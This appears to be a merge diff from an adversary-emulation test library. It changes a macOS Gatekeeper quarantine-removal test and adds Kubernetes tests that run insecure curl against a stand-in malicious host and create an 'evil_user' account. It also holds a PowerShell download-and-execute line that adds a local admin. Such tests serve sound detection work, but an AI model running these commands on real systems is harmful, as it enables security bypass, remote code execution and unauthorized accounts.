Merge branch 'master' into insecure-curl

atomics/Indexes/index.yaml

@@ -6569,10 +6569,9 @@ defense-evasion:
           type: path
           default: myapp.app
       executor:
-        command: 'sudo xattr -d com.apple.quarantine #{app_path}
+        command: 'xattr -d com.apple.quarantine #{app_path}
 
           '
-        elevation_required: true
         name: sh
   T1553.002:
     technique:

atomics/Indexes/macos-index.yaml

@@ -3500,10 +3500,9 @@ defense-evasion:
           type: path
           default: myapp.app
       executor:
-        command: 'sudo xattr -d com.apple.quarantine #{app_path}
+        command: 'xattr -d com.apple.quarantine #{app_path}
 
           '
-        elevation_required: true
         name: sh
   T1553.002:
     technique:

atomics/T1105/T1105.yaml

@@ -1268,4 +1268,34 @@ atomic_tests:
       Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json" -Force -ErrorAction Ignore
 
     name: powershell
-    elevation_required: false
+    elevation_required: false
+- name: Curl Insecure Connection from a Pod
+  description: |
+    Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure)
+    against a target URL. The pod is automatically deleted after execution.
+  supported_platforms:
+  - containers
+  input_arguments:
+    pod_name:
+      description: K8s pod_name to execute the command in
+      type: string
+      default: atomic-insecure-curl
+    remote_url:
+      description: Remote URL to curl
+      type: string
+      default: https://malicious-apt.com
+    image_name:
+      description: Name of the docker image
+      type: string
+      default: curlimages/curl
+  dependencies:
+  - description: kubectl must be installed and configured
+    get_prereq_command: |
+      echo "kubectl must be installed manually"
+    prereq_command: |
+      which kubectl
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- curl -ksL #{remote_url}

atomics/T1136.001/T1136.001.yaml

@@ -185,3 +185,33 @@ atomic_tests:
     command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/0xv1n/dotnetfun/9b3b0d11d1c156909c0b1823cff3004f80b89b1f/Persistence/CreateNewLocalAdmin_ART.ps1')
     name: powershell
     elevation_required: true
+- name: Create a Linux user via kubectl in a Pod
+  description: |
+    Launches a short-lived Alpine pod and creates a Linux user inside the pod.
+    The pod is automatically deleted after execution.
+  supported_platforms:
+  - containers
+  input_arguments:
+    pod_name:
+      description: K8s pod_name to execute the command in
+      type: string
+      default: atomic-linux-useradd
+    username:
+      description: Username of the user to create inside the pod
+      type: string
+      default: evil_user
+    image_name:
+      description: Name of the docker image
+      type: string
+      default: alpine
+  dependencies:
+  - description: kubectl must be installed and configured
+    get_prereq_command: |
+      echo "kubectl must be installed manually"
+    prereq_command: |
+      which kubectl
+  executor:
+    name: bash
+    elevation_required: false
+    command: |
+      kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- sh -lc 'adduser -D #{username} && id #{username}'

atomics/T1553.001/T1553.001.md

@@ -45,11 +45,11 @@ Gatekeeper Bypass via command line
 | app_path | Path to app to be used | path | myapp.app|
 
 
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+#### Attack Commands: Run with `sh`! 
 
 
 ```sh
-sudo xattr -d com.apple.quarantine #{app_path}
+xattr -d com.apple.quarantine #{app_path}
 ```